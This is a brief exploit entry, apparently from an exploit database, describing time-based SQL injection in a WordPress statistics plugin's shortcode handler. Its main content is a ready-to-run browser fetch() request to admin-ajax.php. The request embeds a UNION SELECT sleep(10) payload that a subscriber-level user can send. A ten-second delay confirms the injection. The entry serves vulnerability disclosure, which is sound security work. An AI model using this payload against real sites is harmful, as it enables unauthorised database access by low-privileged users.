Share
## https://sploitus.com/exploit?id=WPEX-ID:B82BDD02-B699-4527-86CC-D60B56AB0C55
While logged in as a subscriber, send the following request:

(await fetch('/wp-admin/admin-ajax.php',{method:'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'},body:'action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(10)-- a[/slimstat]'})).text()

If successful, the request should hang for ~10 seconds, indicating we successfully injected something in the affected SQL query.